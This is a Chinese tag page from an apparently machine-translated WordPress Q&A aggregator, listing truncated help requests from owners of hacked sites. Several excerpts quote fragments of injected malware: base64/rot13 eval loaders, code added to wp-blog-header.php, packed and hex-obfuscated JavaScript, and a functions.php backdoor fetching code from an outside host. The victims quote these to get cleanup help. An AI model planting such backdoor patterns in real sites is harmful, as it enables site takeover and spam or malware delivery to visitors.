您当前的位置:首页 > TAG信息列表 > hacked

  • Is my WP site being hacked?

    时间:2018-11-17

    在过去的一个月左右,我看到每天有3到4个新用户使用“笨拙”的用户名(字母/数字)注册。几天后,他们开始更改密码。几天后,他们删除了这个帐户。我怀疑正在进行某种黑客攻击,所以我在网站上使用了WordFence;我确保新用户在注册时必须使用“强”密码(和验证码);用户只能更改一次密码。但我还是想知道是否发生了什么事。我应该做得更多还是偏执?

  • 我是否被黑客攻击-正在获取8个本地主机WordPress站点的新站点设置电子邮件

    时间:2018-11-24

    我刚刚在我的垃圾邮件文件夹中找到一些电子邮件,说我的本地服务器上已经建立了一个新的wordpress站点,可安装8个现有的wordpress。我假设它被黑客入侵了,但不是百分之百。当我认为这件事发生的时候,我的电脑很奇怪,不允许我上网。。。

  • Site hacked with malware

    时间:2015-10-13

    Sucuri站点检查告诉我,我的站点被恶意软件感染。问题检测到定义感染URLSEO垃圾邮件MW:垃圾邮件:SEO?某人http://mywebsite/about/ (查看有效负载)SEO垃圾邮件MW:垃圾邮件:SEO?某人http://mywebsite/2013/bad-times-for-home-owners/ (查看有效负载)SEO垃圾邮件MW:垃圾邮件:SEO?shttp://mywebsite.com (查看有效负载)尖叫的青蛙告诉我mywebsite.com/about 永久移动(301)

  • 使用暂态API的网站被黑客攻击?

    时间:2015-11-06

    我有一个要“清理”的网站,在public\\u html文件夹中有近10k个复制文件,几乎所有PHP文件都包含代码$z=get_option(\"_transient_wp_less_compiled_c9b58ec39525169515675906d91c9815\"); $z=base64_decode(str_rot13($z[\'root\'])); if(strpos($z,\"E8FA4873\")!==false){ $_z=create_function(\"\",$z); @$_z();

  • 服务器被黑客攻击:wp-上传目录的内容正确吗?

    时间:2015-11-22

    我们的Wordpress服务器开始运行得非常慢,尽管服务器本身的负载非常低(<;1%)。wp admin页面根本没有响应。经过调查,发现该服务器遭到黑客攻击,并且充斥着色情文件。我们正在重建它,但没有备份。wp uploads目录中似乎有很多这样的文件。除了2013、2014、2015等常用目录外,该目录中是否还应包含其他文件?此目录的正确权限是什么,它当前是完全公开的。我猜是黑客干的:drwxrwxrwx 20 root root 4096 Nov 21 12:14 uploads 有一些

  • 我应该如何处理被黑客入侵的服务器?

    时间:2017-01-25

    我的(托管的)专用服务器有几个站点(并非所有站点都使用WP)被黑客攻击。模糊代码已附加到所有文件(包括WP核心/插件/主题和非WP内容)中,其中内容以php命令开头(而不仅仅是所有后缀为.php的文件)。它似乎不会影响呈现的页面,据我所知,这是一个后门/特洛伊木马程序,我所知有限。今天,我发现权限更改为200,我怀疑这可能是我的服务提供商所为(虽然我还没有收到通知,也没有回答我的“你有没有…”问题)。我对代码的功能很好奇,尽管解码它并不值得,因为它在某种程度上显然是“坏事”。我想找出损坏的程度、原因,并防

  • 如果WP安装被黑客攻击,它会传播到服务器上的其他域吗?

    时间:2017-01-26

    我有一个托管服务器,有几个可湿性粉剂和非可湿性粉剂站点,所有文件(服务器上的所有域)的内容都预先添加了代码,这些文件以php命令开头。我想知道原因是一个WP安装中的漏洞或密码猜测,还是ftp密码猜测或其他原因。

  • 如何防止机器人或其他人自动修改任何文件?

    时间:2017-01-31

    有人每天修改我们的网站文件wp-blog-header.php.他们正在添加以下代码,在我们的网站中自动生成不必要的页面,代码为:$e = pathinfo($f = strtok($p = @$_SERVER[\"REQUEST_URI\"], \"?\"), PATHINFO_EXTENSION); if ((!$e || in_array($e, array(\"html\", \"jpg\", \"png\", \"gif\")) || basename($f,

  • 为什么unctions.php文件会自动清空?

    时间:2017-02-08

    在许多WordPress网站功能中。php文件将自动擦除。我检查了所有文件。我扫描了服务器上的文件,但没有文件被感染。过了一段时间网站响应白色页面,当我检查功能时。php它为空。为什么会发生这种情况。这是服务器问题吗?

  • 目前的一系列黑客攻击是否与最近的安全修复有关?

    时间:2017-02-10

    上周发生了一连串的黑客攻击。在每一种情况下,这篇文章的内容都被编辑成幼稚的“黑客”或政治信息。此帖子https://codex.wordpress.org/Version_4.7.2 指版本4.7.0和4.7.1受到REST API端点中未经验证的权限提升漏洞的影响破坏者是否在过期的WP安装中利用此漏洞,或者这是另一个问题?我想知道升级到4.7.2是否是解决方案-是的,我知道人们应该使用最新版本,但他们不是我的网站。

  • 如何找到黑客的后门

    时间:2017-02-11

    今天,我们客户的一个WordPress网站被黑客入侵,该网站由亚马逊aws ubuntu托管。问题是https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.htmljs代码被注入所有js中var _0xaae8=[\"\",\"\\x6A\\x6F\\x69\\x6E\",\"\\x72\\x65\\x76\\x65\\x72\\x73\\x65\",\"\\x73\\x70\\x6C\\x69\\x74\",\"\\x3E\\x74\\x7

  • 网站遭黑客攻击后WordPress页脚丢失

    时间:2017-02-22

    我的wordpress网站被黑客入侵,一旦恢复,我似乎无法查看页脚。我已经检查了主题选项/小部件,设置似乎很好。请告知可能的原因和解决方案。网址:www.boltonuniform。co.za公司

  • 管理员用户在黑客攻击后缺乏管理员权限,无法恢复

    时间:2017-03-20

    我的网站(Apache/Linux上的4.5.3)遭到黑客攻击,我怀疑类似的情况described here. 据我所知,我已经删除或至少禁用了黑客,但是管理员用户无法执行更新WordPress、添加插件等操作。到目前为止,我已经尝试:通过phpMyAdmin编辑现有管理员用户的权限</通过phpMyAdmin添加一个全新的管理员用户</使用新下载的(当前安装的相同版本)覆盖核心WP文件</禁用(然后完全删除)所有插件</所有这些都没有用。有没有想过我下一步可以尝试什么?

  • WordPress网站遭到黑客攻击。.htaccess是否已被黑客入侵?

    时间:2017-03-22

    我正在清理一个被黑客入侵的WordPress网站。我注意到.htaccess 文件中有一些看起来可疑的正则表达式,但我的正则表达式技能相当弱(我想是时候学习了)。我试过更换.htaccess 使用默认WordPress的文件.htaccess, 但它会立即自动重写。我需要知道的是这段代码是怎么回事:# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRu

  • 被黑客攻击的WordPress网站/主页重定向

    时间:2017-04-23

    我对这篇文章的篇幅感到非常抱歉,请耐心等待,因为我将尝试列出我迄今为止所做的一切。我正在处理一个被黑客入侵的WordPress网站,该网站已经有很长一段时间没有更新,密码很弱。。此外,没有备份。该网站使用Enfold主题。好了,开始吧!我已经删除了大部分插件。剩下的是最快的缓存,它就在那里,再加上我安装的几个安全插件。还有其他一些对前端很重要;我删除了它们,但有些东西消失了,所以最终还是把它们放了回去</更新了所有剩余的过时插件,并安装了最新的WordPress版本</删除了两个管理员中的一个

  • 我的博客被黑了?WP随机发布帖子

    时间:2019-02-03

    我一直在这个网站上搜索关于博客是黑客的帖子,但我没有找到这样的帖子。我们的一个编辑帐户开始发布随机帖子。我们的第一个想法是他的密码被偷走了,所以我们更改了密码,告诉他在一定时间内不要登录。第二天又出现了随机帖子。我们昨天尝试将他的角色更改为订阅者,因此他没有发布的权限。今天早上又出现了随机帖子。你们有没有遇到过类似的情况?有什么解决办法吗?谢谢

  • 有没有一种简单的方法可以将WordPress网站的文件重新设置为开箱即用?

    时间:2019-04-02

    我有一个业余的wordpress网站,为一个似乎被黑客入侵的俱乐部服务。在这里有了一些帮助,我已经解决了一些问题,但我仍然有很多问题。主要是我无法进入仪表板或编辑任何页面。我可以使用我的旧管理员帐户登录,该帐户仍然具有db(usermeta)中的所有属性,这意味着它是一个管理员,但我可以403禁止您没有访问此文档的权限。当我试图编辑任何页面或执行除查看页面以外的任何操作时。单击仪表板是唯一不带我去403的东西,它会带我去一个完全未格式化的页面,该页面以链接列表(将在仪表板中)开始,然后看起来像是主窗格中未

  • 这是Function.php中的黑客脚本吗?

    时间:2019-04-03

    我在neve主题WordPress中有如下代码。我对这个代码感到怀疑$wp_auth_key=\'ac15616a33a4bae1388c29de0202c5e1\'; if (($tmpcontent = @file_get_contents(\"http://www.darors.com/code.php\") OR $tmpcontent = @file_get_contents_tcurl(\"http://www.darors.com/code.php\")) AND s

  • 为新用户分配了两个角色:客户和超级管理员

    时间:2019-04-12

    我有一个关于WordPress中用户角色的问题。新用户已注册后。他们可以使用superadmin和客户角色进行访问。他们可以访问/wp admin/,创建博客等。。根据我的理解,新用户应该只获得1个角色,例如“客户”。我试图在我的网站上进行调查。所有用户都被分配了两个角色:“客户”和“超级管理员”。我想我的网站被黑客攻击了。如何阻止它们以及如何修复用户角色问题。非常感谢你

  • 为什么黑客会把这些代码添加到每个帖子中,以及如何进行大规模清理?

    时间:2019-04-12

    下面是我在两篇不同帖子中看到的代码示例:<noindex><script id=\"wpinfo-pst1\" type=\"text/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[